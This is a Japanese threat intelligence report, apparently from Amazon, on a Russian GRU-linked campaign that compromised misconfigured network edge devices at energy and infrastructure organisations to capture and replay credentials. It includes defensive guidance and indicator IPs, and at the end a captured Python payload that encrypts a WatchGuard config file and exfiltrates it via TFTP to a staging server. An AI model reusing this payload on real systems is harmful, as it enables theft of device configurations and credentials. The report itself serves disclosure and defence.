Amazon 脅威インテリジェンスがロシアのサイバー脅威グループによる西側諸国重要インフラへの標的型攻撃を特定

2025 年の締めくくりとして、Amazon Threat Intelligence は、重要インフラを標的とした攻撃において大きな進化を示す、数年にわたるロシア国家支援型サイバー攻撃キャンペーンに関する知見を共有します。このキャンペーンでは、設定ミスのあるお客様のネットワークエッジデバイスが主要な初期アクセスベクトルとなり、脆弱性を悪用する活動は減少するという戦術的な転換が見られました。この戦術的な適応により、認証情報の窃取や被害組織のオンラインサービスおよびインフラストラクチャへのラテラルムーブメント (横方向への移動) という同じ攻撃目的を達成しながら、脅威アクターの露出とリソース消費を削減できるようになっています。

2026 年に向けて、組織はネットワークエッジデバイスのセキュリティ確保と認証情報リプレイ攻撃の監視を優先し、この永続的な脅威から防御する必要があります。Amazon のテレメトリで観測された既知の Sandworm (APT44 や Seashell Blizzard としても知られる) の活動との攻撃インフラの共通点と、一貫した標的パターンに基づき、この活動クラスターがロシア連邦軍参謀本部情報総局 (GRU) に関連している可能性が高いと判断しています。このキャンペーンは、西側の重要インフラ、特にエネルギーセクターに対する継続的な注力を示しており、2021 年から現在まで活動が継続しています。

キャンペーンの範囲と標的: Amazon Threat Intelligence は、2021 年から 2025 年にかけてグローバルインフラストラクチャに対する継続的な標的型攻撃を観測しており、特にエネルギーセクターに焦点が当てられています。このキャンペーンは、戦術の明確な進化を示しています。

タイムライン:

• 2021〜2022 年: Amazon MadPot が WatchGuard の悪用 (CVE-2022-26318) を検出。設定ミスのあるデバイスへの標的活動を観測
• 2022〜2023 年: Confluence の脆弱性悪用 (CVE-2021-26084、CVE-2023-22518)。設定ミスのあるデバイスへの標的活動が継続
• 2024 年: Veeam の悪用 (CVE-2023-27532)。設定ミスのあるデバイスへの標的活動が継続
• 2025 年: 設定ミスのあるお客様のネットワークエッジデバイスへの継続的な標的型攻撃。N-day エクスプロイト/ゼロデイエクスプロイト活動の減少

主な標的:

• 西側諸国のエネルギーセクター組織
• 北米および欧州の重要インフラプロバイダー
• クラウドホスト型ネットワークインフラストラクチャを持つ組織

一般的に標的となるリソース:

• エンタープライズルーターおよびルーティングインフラストラクチャ
• VPN コンセントレータ (VPN 集約装置) およびリモートアクセスゲートウェイ
• ネットワーク管理アプライアンス
• コラボレーションおよび Wiki プラットフォーム
• クラウドベースのプロジェクト管理システム

管理インターフェイスが露出した、設定ミスのある「容易に狙える標的」であるお客様のデバイスを標的にすることで、同じ攻撃目的を達成できます。つまり、重要インフラネットワークへの永続的なアクセスと、被害組織のオンラインサービスにアクセスするための認証情報の窃取です。脅威アクターの活動ペースの変化は、懸念される進化を示しています。お客様の設定ミスを標的とする活動は少なくとも 2022 年から継続していますが、この脅威アクターは 2025 年にこの活動に継続的に注力しながら、ゼロデイエクスプロイトおよび N-day エクスプロイトの使用を減少させました。これにより、より検出されやすい脆弱性悪用攻撃を通じて活動が露見するリスクを大幅に低減しています。

被害組織の認証情報を窃取する手法を直接観測していませんが、複数の指標からパケットキャプチャとトラフィック分析が主要な収集方法であることを示しています。

1. 時間分析: デバイスの侵害から被害者のサービスに対する認証試行までの時間差は、能動的な認証情報の窃取ではなく受動的な収集を示唆しています
2. 認証情報の種類: オンラインサービスへのアクセスに被害組織の認証情報 (デバイスの認証情報ではない) が使用されていることは、ユーザー認証トラフィックの盗聴を示しています
3. 既知の攻撃手法: Sandworm の活動には一貫してネットワークトラフィック盗聴機能が含まれています
4. 戦略的な位置取り: お客様のネットワークエッジデバイスを標的にすることで、脅威アクターは転送中の認証情報を盗聴できる位置に配置されます

AWS でホストされているインフラストラクチャの侵害: Amazon のテレメトリは、AWS でホストされているお客様のネットワークエッジデバイスに対する組織的な活動を明らかにしています。これは AWS の脆弱性によるものではなく、お客様が設定ミスをしたデバイスであると考えられます。ネットワーク接続分析では、脅威アクターが制御する IP アドレスが、お客様のネットワークアプライアンスソフトウェアを実行している侵害された EC2 インスタンスへの永続的な接続を確立していることが示されています。分析の結果、複数の影響を受けたインスタンス全体で、インタラクティブなアクセスとデータ取得と一致する永続的な接続が明らかになりました。

認証情報リプレイ活動: 被害者のインフラストラクチャへの直接的な侵害に加えて、被害組織のオンラインサービスに対する体系的な認証情報リプレイ攻撃を観測しました。観測された事例では、脅威アクターは AWS でホストされているお客様のネットワークエッジデバイスを侵害し、その後、被害組織のドメインに関連付けられた認証情報を使用して、そのオンラインサービスに対する認証を試みました。これらの特定の試行は失敗しましたが、デバイスの侵害後に被害者の認証情報を使用した認証試行が行われるパターンは、脅威アクターが侵害されたお客様のネットワークインフラストラクチャから認証情報を窃取し、標的組織のオンラインサービスに対してリプレイしているという私たちの分析を裏付けています。脅威アクターのインフラストラクチャは、2025 年を通じて、以下を含む重要セクター全体の複数の組織の認証エンドポイントにアクセスしました。

• エネルギーセクター: 電力会社、エネルギープロバイダー、およびエネルギーセクターのクライアントを専門とするマネージドセキュリティサービスプロバイダー
• テクノロジー/クラウドサービス: コラボレーションプラットフォーム、ソースコードリポジトリ
• 通信: 複数のリージョンにわたる通信プロバイダー

地理的分布: 標的活動はグローバルな範囲に及んでいます。

• 北米
• 欧州 (西欧および東欧)
• 中東
• 標的活動は、直接的な運用者と重要インフラネットワークへのアクセスを持つサードパーティのサービスプロバイダーの両方を含む、エネルギーセクターのサプライチェーンへの継続的な注力を示しています。

  キャンペーンの流れ:

1. AWS でホストされているお客様のネットワークエッジデバイスを侵害する
2. ネイティブのパケットキャプチャ機能を活用する
3. 盗聴したトラフィックから認証情報を窃取する
4. 被害組織のオンラインサービスおよびインフラストラクチャに対して認証情報をリプレイする
5. ラテラルムーブメントのための永続的なアクセスを確立する

Amazon Threat Intelligence は、Bitdefender が「Curly COMrades」として追跡しているグループとの攻撃インフラの共通点を特定しました。これらがより広範な GRU キャンペーン内の補完的な活動を表している可能性があると考えています。

• Bitdefender のレポート: 侵害後のホストベースの攻撃手法 (EDR 回避のための Hyper-V 悪用、カスタムインプラント CurlyShell/CurlCat)
• Amazon のテレメトリ: 初期アクセスベクトルとクラウドピボット手法

このような役割分担 (一方のクラスターがネットワークアクセスと初期侵害に注力し、もう一方がホストベースの永続化と回避を担当する) は、より広範なキャンペーン目標を支援する専門化されたサブクラスターという GRU の活動パターンと一致しています。

Amazon は、高度な脅威アクターを積極的に調査し阻止することで、お客様とより広範なインターネットエコシステムの保護に引き続き取り組んでいます。

即時対応アクション:

• 侵害されたネットワークアプライアンスリソースを持つ影響を受けたお客様を特定し、通知
• 侵害された EC2 インスタンスの即時修復を支援
• 業界パートナーおよび影響を受けたベンダーとインテリジェンスを共有
• セキュリティ調査を支援するため、ネットワークアプライアンスベンダーに観測結果を報告

阻止活動の効果: 協調的な取り組みにより、この活動を発見して以来、活動中の脅威アクターのオペレーションを阻止し、この脅威活動サブクラスターが利用可能なアタックサーフェスを削減しました。Amazon は引き続きセキュリティコミュニティと協力してインテリジェンスを共有し、重要インフラを標的とする国家支援型の脅威に対して共同で防御していきます。

組織は、この活動パターンの証拠を積極的に監視する必要があります。

1. ネットワークエッジデバイスの監査

• すべてのネットワークエッジデバイスで予期しないパケットキャプチャファイルやユーティリティがないか監査する
• デバイス設定で露出した管理インターフェイスがないか確認する
• 管理インターフェイスを分離するためにネットワークセグメンテーションを実装する
• 強力な認証を適用する (デフォルト認証情報の変更、MFA の実装)

2. 認証情報リプレイの検出

• ネットワークデバイス管理インターフェイスとオンラインサービス間での認証情報の再利用がないか認証ログを確認する
• 予期しない地理的位置からの認証試行を監視する
• 組織のオンラインサービス全体で認証パターンの異常検出を実装する
• デバイス侵害の疑いがある場合、遅延した認証情報リプレイ試行がないか延長された時間枠を確認する

3. アクセス監視

• 予期しない送信元 IP からルーター/アプライアンス管理ポータルへのインタラクティブセッションを監視する
• ネットワークデバイス管理インターフェイスが意図せずインターネットに露出していないか確認する
• 認証情報を露出させる可能性のある平文プロトコルの使用 (Telnet、HTTP、暗号化されていない SNMP) を監査する

4. IOC の確認

エネルギーセクター組織および重要インフラ運用者は、以下に記載された IOC からの認証試行がないかアクセスログの確認を優先する必要があります。

AWS 環境では、以下の保護対策を実装してください。

ID およびアクセス管理:

• 可能な限り、ID プロバイダーと IAM ロールを使用した ID フェデレーションで AWS リソースおよび API へのアクセスを管理する
• 詳細については、IAM ユーザーガイドの IAM ポリシーの作成を参照してください

ネットワークセキュリティ:

• セキュリティグループに最小権限のルールを実装する
• 踏み台ホストアクセスを使用してプライベートサブネットに管理インターフェイスを分離する
• ネットワークトラフィック分析のために VPC Flow Logs を有効にする

脆弱性管理:

• Amazon Inspector を使用して、Amazon EC2 インスタンスのソフトウェアの脆弱性と意図しないネットワークの露出を自動的に検出してスキャンする
• 詳細については、Amazon Inspector ユーザーガイドを参照してください
• インスタンス上のオペレーティングシステムとアプリケーションを定期的にパッチ適用、更新、保護する

検出と監視:

• API アクティビティ監視のために AWS CloudTrail を有効にする
• 脅威検出のために Amazon GuardDuty を設定する
• 認証情報リプレイパターンがないか認証ログを確認する

IOC (侵害の痕跡)

IOC 値	IOC タイプ	初回観測	最終観測	注釈
91.99.25[.]54	IPv4	2025-07-02	現在	脅威アクターのトラフィックをプロキシするために使用された侵害された正規サーバー
185.66.141[.]145	IPv4	2025-01-10	2025-08-22	脅威アクターのトラフィックをプロキシするために使用された侵害された正規サーバー
51.91.101[.]177	IPv4	2024-02-01	2024-08-28	脅威アクターのトラフィックをプロキシするために使用された侵害された正規サーバー
212.47.226[.]64	IPv4	2024-10-10	2024-11-06	脅威アクターのトラフィックをプロキシするために使用された侵害された正規サーバー
213.152.3[.]110	IPv4	2023-05-31	2024-09-23	脅威アクターのトラフィックをプロキシするために使用された侵害された正規サーバー
145.239.195[.]220	IPv4	2021-08-12	2023-05-29	脅威アクターのトラフィックをプロキシするために使用された侵害された正規サーバー
103.11.190[.]99	IPv4	2021-10-21	2023-04-02	WatchGuard 設定ファイルを窃取するために使用された侵害された正規ステージングサーバー
217.153.191[.]190	IPv4	2023-06-10	2025-12-08	偵察と標的選定に使用された長期インフラストラクチャ

注: 特定されたすべての IP は、脅威アクターにとって複数の目的に使用されているか、正規の運用を継続している可能性のある侵害された正規サーバーです。組織は自動的にブロックするのではなく、一致した場合のコンテキストを調査する必要があります。記載された期間中にこれらの IP がルーター管理インターフェイスにアクセスし、オンラインサービスへの認証を試行していることを観測しました。

以下のペイロードは、2022 年の WatchGuard 悪用キャンペーン中に Amazon MadPot によってキャプチャされたものです。

from cryptography.fernet import Fernet
import subprocess
import os

key = 'uVrZfUGeecCBHhFmn1Zu6ctIQTwkFiW4LGCmVcd6Yrk='

with open('/etc/wg/config.xml', 'rb') as config_file:
buf = config_file.read()

fernet = Fernet(key)
enc_buf = fernet.encrypt(buf)

with open('/tmp/enc_config.xml', 'wb') as encrypted_config:
encrypted_config.write(enc_buf)

subprocess.check_output(['tftp', '-p', '-l', '/tmp/enc_config.xml', '-r',
'[REDACTED].bin', '103.11.190[.]99'])
os.remove('/tmp/enc_config.xml')

このペイロードは、脅威アクターの攻撃手法を示しています。窃取した設定データを暗号化し、TFTP 経由で侵害されたステージングインフラストラクチャに送信した後、フォレンジック証拠を削除しています。